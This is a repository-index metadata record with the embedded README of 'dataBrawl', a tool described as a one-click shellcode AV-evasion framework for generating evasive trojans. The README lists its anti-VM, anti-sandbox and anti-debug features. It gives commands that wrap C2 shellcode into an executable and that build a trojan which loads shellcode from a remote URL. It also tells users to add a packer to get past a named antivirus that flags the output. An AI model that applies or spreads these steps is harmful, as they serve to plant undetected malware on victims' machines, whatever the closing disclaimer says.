{"id":17383358,"url":"https://github.com/cherno-x/databrawl","last_synced_at":"2025-10-16T05:12:10.520Z","repository":{"id":233758946,"uuid":"787766022","full_name":"Cherno-x/dataBrawl","owner":"Cherno-x","description":"One-click shellcode AV-evasion framework for generating evasive trojans","archived":false,"fork":false,"pushed_at":"2024-06-28T09:25:57.000Z","size":23339,"stargazers_count":178,"open_issues_count":0,"forks_count":23,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-05-09T00:01:58.778Z","etag":null,"topics":["antivirus","infosec","redteam","redteam-tools","security-tools","shellcode"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Cherno-x.png","metadata":{"files":{"readme":"README.MD","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-04-17T06:27:54.000Z","updated_at":"2025-05-04T10:31:01.000Z","dependencies_parsed_at":"2024-10-16T07:41:30.166Z","dependency_job_id":"33c175a1-9506-4977-b135-9df04205996e","html_url":"https://github.com/Cherno-x/dataBrawl","commit_stats":null,"previous_names":["cherno-x/databrawl"],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cherno-x%2FdataBrawl","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cherno-x%2FdataBrawl/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cherno-x%2FdataBrawl/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cherno-x%2FdataBrawl/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Cherno-x","download_url":"https://codeload.github.com/Cherno-x/dataBrawl/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":253166502,"owners_count":21864475,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["antivirus","infosec","redteam","redteam-tools","security-tools","shellcode"],"created_at":"2024-10-16T07:41:23.055Z","updated_at":"2025-10-16T05:12:10.409Z","avatar_url":"https://github.com/Cherno-x.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# dataBrawl\r\n\r\n**(Note, 28 June 2024: maintenance is paused during the major-event period; the core template has been removed)**\r\n\r\n![dataBrawl](./assets/dataBrawl.png)\r\n\r\nA shellcode AV-evasion framework that generates an evasive trojan in one step, supporting both a **local loading** mode and a **remote loading** mode.\r\n\r\n## Feature\r\n1. Local / separated (staged) loading\r\n2. ollvm obfuscated compilation / gcc compilation\r\n3. IAT obfuscate\r\n4. Anti-VM\r\n5. Anti-Sandbox (API Hammering, custom sleep)\r\n6. Anti-Debug\r\n7. Memory encryption\r\n8. add resource/sign\r\n\r\n## Environment setup\r\n\r\nThis tool is compiled with mingw or ollvm. Compiling with ollvm needs no build environment to be prepared (the generated exe is larger, and QVM needs extra handling).\r\n\r\nCompiling with mingw requires a ready build environment; download the mingw compiler:\r\n\r\nOfficial site: https://www.mingw-w64.org/\r\n\r\nWindows download link: https://sourceforge.net/projects/mingw-w64/files/\r\n\r\nI downloaded x86_64-win32-seh; pick the build that matches your system, or download the online installer directly.\r\n\r\n\u003cimg src=\"./assets/image-20240417134130271.png\" alt=\"image-20240417134130271\" style=\"zoom:50%;\" /\u003e\r\n\r\nAdd the system environment variable:\r\n\r\npath = extraction-directory/mingw64/bin\r\n\r\nIt is best to also add the corresponding include and lib directories to the include and lib environment variables, so the compiler does not fail to find the link libraries.\r\n\r\n## Usage\r\n\r\npython dataBrawl.py -h\r\n\r\n![image-20240625170435636](./assets/image-20240625170435636.png)\r\n\r\n#### Loading shellcode locally\r\n\r\nGenerate shellcode with CS or another C2\r\n\r\n![image-20240417140327230](./assets/image-20240417140327230.png)\r\n\r\n-i copies the resources, icon and signature information of the target exe\r\n\r\n```shell\r\npython dataBrawl.py D:\\Dev\\dataBrawl\\payload_x64.bin -b 1 -t stdtemp -i \"C:\\Users\\xxx\"\r\n```\r\n\r\n![image-20240625170651334](./assets/image-20240625170651334.png)\r\n\r\nBy default result.exe is generated in the project root directory; -o can also specify the output location.\r\n\r\nThis uses gcc compilation, and QVM currently does not flag it. For ollvm compilation set the -b option to 2; QVM currently has problems with it, so a packer can be added on top. I use Enigma Protector here; roughly pick the configuration yourself, and QVM cannot block it. https://down.52pojie.cn/Tools/Packers/The_Enigma_Protector_v7.40_x32_x64.rar But QVM is rather unpredictable and may start flagging it in a couple of days; you can go straight to ollvm compilation + packer.\r\n\r\n![image-20240626110232217](./assets/image-20240626110232217.png)\r\n\r\nIf it is still detected after ollvm plus packing, change the packer options.\r\n\r\n#### Loading shellcode remotely\r\n\r\nFirst generate the encrypted shellcode\r\n\r\n```shell\r\npython dataBrawl.py D:\\Dev\\dataBrawl\\payload_x64.bin -c 1 -t remote\r\n```\r\n\r\nGenerate the trojan with the remote template\r\n\r\n```shell\r\npython dataBrawl.py http://www.xxx.com/shellcode.bin -b 1 -t remote -i \"C:\\Users\\xxx\"\r\n```\r\n\r\n# ⚠️ Warning\r\n\r\n**Disclaimer:** Please note that this repository is for learning and research purposes only. When using any technique related to malware development, comply with local laws and regulations and do not engage in any illegal activity. The maintainers of this repository accept no responsibility for the consequences of any improper use.\r\n\r\nSuggestions, bug reports and code contributions to improve this repository are welcome. Let us work together to raise cybersecurity awareness and skills!\r\n\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcherno-x%2Fdatabrawl","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcherno-x%2Fdatabrawl","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcherno-x%2Fdatabrawl/lists"}